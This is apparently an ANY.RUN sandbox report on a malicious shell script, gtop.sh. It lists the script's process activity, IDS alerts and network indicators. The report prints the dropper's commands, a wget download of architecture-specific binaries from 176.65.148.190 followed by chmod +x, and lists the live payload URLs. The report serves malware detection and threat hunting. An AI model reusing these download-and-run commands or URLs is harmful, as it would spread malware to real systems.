File name:

gtop.sh

Full analysis: https://app.any.run/tasks/988f9ab0-24e4-4362-a6de-f1ccf42b6598
Verdict: Malicious activity
Analysis date: May 16, 2025, 17:18:43
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text
MD5:

F87BB1B77B61EB73EFB6E6F6B69085AC

SHA1:

223A688C3D0ED01DBC67D3F8B3D2B66984BBB184

SHA256:

8BBA5E64590D99831D4B6DE979370287111C9DA5068F93FB41BB632C9C4A4111

SSDEEP:

48:lTiLTfLTLlTEhbIhDTnh3T8bCBETfchtNTrWJXdTXCsTiLTfLTLlTEhbTghDTnhc:FOZWWB0cPQaZWWB0cPMaZWWBgcPW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • jackmyx86 (PID: 41083)
      • jackmyx86 (PID: 41049)
      • jackmyx86 (PID: 41051)
      • jackmyx86 (PID: 41050)
      • jackmyx86 (PID: 41084)
      • jackmyx86 (PID: 41085)
      • jackmyi686 (PID: 41055)
      • jackmyi586 (PID: 41065)
      • jackmyi586 (PID: 41101)
      • jackmyi586 (PID: 41066)
      • jackmyi586 (PID: 41103)
      • jackmyi586 (PID: 41102)
      • jackmyi686 (PID: 41057)
      • jackmyi586 (PID: 41064)
      • jackmyi686 (PID: 41119)
      • jackmyi686 (PID: 41120)
      • jackmyi686 (PID: 41121)
      • jackmyi686 (PID: 41094)
      • jackmyi686 (PID: 41092)
      • jackmyi686 (PID: 41056)
      • jackmyi686 (PID: 41093)

  • SUSPICIOUS

    • Executes commands using command-line interpreter

      • sudo (PID: 41032)
      • bash (PID: 41033)

    • Modifies file or directory owner

      • sudo (PID: 41029)

    • Reads network configuration

      • bash (PID: 41033)

    • Gets active network interfaces

      • bash (PID: 41033)

    • Uses wget to download content

      • bash (PID: 41033)

    • Potential Corporate Privacy Violation

      • wget (PID: 41039)
      • wget (PID: 41069)
      • wget (PID: 41043)
      • wget (PID: 41035)
      • wget (PID: 41058)
      • wget (PID: 41077)
      • wget (PID: 41081)
      • wget (PID: 41062)
      • wget (PID: 41073)
      • wget (PID: 41047)
      • wget (PID: 41090)
      • wget (PID: 41053)
      • wget (PID: 41095)
      • wget (PID: 41113)
      • wget (PID: 41108)
      • wget (PID: 41117)
      • wget (PID: 41086)
      • wget (PID: 41099)
      • wget (PID: 41122)

    • Connects to the server without a host name

      • wget (PID: 41081)
      • wget (PID: 41077)
      • wget (PID: 41086)
      • wget (PID: 41122)
      • wget (PID: 41127)
      • wget (PID: 41128)
      • wget (PID: 41113)
      • wget (PID: 41117)

  • INFO

    • Checks timezone

      • wget (PID: 41039)
      • wget (PID: 41035)
      • wget (PID: 41043)
      • wget (PID: 41047)
      • wget (PID: 41053)
      • wget (PID: 41058)
      • wget (PID: 41062)
      • wget (PID: 41068)
      • wget (PID: 41073)
      • wget (PID: 41069)
      • wget (PID: 41077)
      • wget (PID: 41095)
      • wget (PID: 41081)
      • wget (PID: 41086)
      • wget (PID: 41090)
      • wget (PID: 41099)
      • wget (PID: 41067)
      • wget (PID: 41113)
      • wget (PID: 41117)
      • wget (PID: 41104)
      • wget (PID: 41105)
      • wget (PID: 41108)
      • wget (PID: 41127)
      • wget (PID: 41128)
      • wget (PID: 41122)

    • Creates file in the temporary folder

      • wget (PID: 41035)
      • wget (PID: 41039)
      • wget (PID: 41043)
      • wget (PID: 41047)
      • wget (PID: 41053)
      • wget (PID: 41058)
      • wget (PID: 41062)
      • wget (PID: 41081)
      • wget (PID: 41069)
      • wget (PID: 41073)
      • wget (PID: 41077)
      • wget (PID: 41086)
      • wget (PID: 41090)
      • wget (PID: 41095)
      • wget (PID: 41099)
      • wget (PID: 41108)
      • wget (PID: 41113)
      • wget (PID: 41117)
      • wget (PID: 41122)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
220
Monitored processes
89
Malicious processes
2
Suspicious processes
6

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs jackmyx86 no specs wget no specs jackmyx86 no specs wget jackmyx86 chmod no specs jackmyi686 no specs wget jackmyi686 no specs jackmyi686 chmod no specs bash no specs wget chmod no specs jackmyi586 no specs wget wget wget jackmyi586 no specs jackmyi586 chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs jackmyx86 no specs jackmyx86 no specs jackmyx86 wget chmod no specs bash no specs wget chmod no specs jackmyi686 no specs jackmyi686 no specs wget jackmyi686 chmod no specs bash no specs wget chmod no specs jackmyi586 no specs jackmyi586 no specs wget jackmyi586 wget wget no specs wget no specs wget chmod no specs bash no specs wget no specs wget chmod no specs bash no specs wget chmod no specs jackmyi686 no specs wget jackmyi686 no specs jackmyi686 chmod no specs bash no specs wget no specs wget wget

Process information

PID
CMD
Path
Indicators
Parent process
41028/bin/sh -c "sudo chown user /tmp/gtop\.sh && chmod +x /tmp/gtop\.sh && DISPLAY=:0 sudo -iu user /tmp/gtop\.sh "/usr/bin/dashIntiFjKCklFyPMJr
User:
root
Integrity Level:
UNKNOWN
Exit code:
2048
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41029sudo chown user /tmp/gtop.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41030chown user /tmp/gtop.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41031chmod +x /tmp/gtop.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41032sudo -iu user /tmp/gtop.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
2048
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41033-bash --login -c \/tmp\/gtop\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
2048
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
41034/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41035wget -q http://176.65.148.190/jackmymipsel/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
41036chmod +x jackmymipsel/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41037-bash --login -c \/tmp\/gtop\.sh/usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Executable files
0
Suspicious files
18
Text files
0
Unknown types
1

Dropped files

PID
Process
Filename
Type
41035wget/tmp/jackmymipselo
MD5:
SHA256:
41039wget/tmp/jackmymipsbinary
MD5:
SHA256:
41043wget/tmp/jackmysh4o
MD5:
SHA256:
41047wget/tmp/jackmyx86binary
MD5:
SHA256:
41053wget/tmp/jackmyi686o
MD5:
SHA256:
41058wget/tmp/jackmypowerpco
MD5:
SHA256:
41062wget/tmp/jackmyi586binary
MD5:
SHA256:
41069wget/tmp/jackmymipsel.1binary
MD5:
SHA256:
41073wget/tmp/jackmymips.1binary
MD5:
SHA256:
41077wget/tmp/jackmysh4.1binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
26
TCP/UDP connections
203
DNS requests
11
Threats
19

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
185.125.190.97:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
41035
wget
GET
200
176.65.148.190:80
http://176.65.148.190/jackmymipsel
unknown
unknown
41039
wget
GET
200
176.65.148.190:80
http://176.65.148.190/jackmymips
unknown
malicious
41043
wget
GET
200
176.65.148.190:80
http://176.65.148.190/jackmysh4
unknown
unknown
41053
wget
GET
200
176.65.148.190:80
http://176.65.148.190/jackmyi686
unknown
unknown
41047
wget
GET
200
176.65.148.190:80
http://176.65.148.190/jackmyx86
unknown
unknown
41058
wget
GET
200
176.65.148.190:80
http://176.65.148.190/jackmypowerpc
unknown
unknown
41062
wget
GET
200
176.65.148.190:80
http://176.65.148.190/jackmyi586
unknown
unknown
41068
wget
GET
404
176.65.148.190:80
http://176.65.148.190/jackmysparc
unknown
unknown
41067
wget
GET
404
176.65.148.190:80
http://176.65.148.190/jackmym86k
unknown
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.96:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
185.125.190.97:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
169.150.255.183:443
odrs.gnome.org
GB
whitelisted
185.125.188.57:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41035
wget
176.65.148.190:80
DE
unknown
41039
wget
176.65.148.190:80
DE
unknown
41043
wget
176.65.148.190:80
DE
unknown
41047
wget
176.65.148.190:80
DE
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.186.142
  • 2a00:1450:4001:82a::200e
whitelisted
connectivity-check.ubuntu.com
  • 185.125.190.97
  • 185.125.190.98
  • 185.125.190.17
  • 91.189.91.48
  • 91.189.91.98
  • 185.125.190.49
  • 185.125.190.48
  • 185.125.190.96
  • 91.189.91.49
  • 185.125.190.18
  • 91.189.91.96
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::196
  • 2001:67c:1562::23
  • 2001:67c:1562::24
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::98
whitelisted
odrs.gnome.org
  • 169.150.255.183
  • 195.181.170.19
  • 169.150.255.181
  • 37.19.194.81
  • 195.181.175.40
  • 207.211.211.26
  • 212.102.56.179
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::101
whitelisted
api.snapcraft.io
  • 185.125.188.57
  • 185.125.188.59
  • 185.125.188.58
  • 185.125.188.54
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::2e6
whitelisted
4.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
41035
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41039
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41043
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41047
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41053
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41058
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41062
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41069
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41073
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41077
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
gtop.sh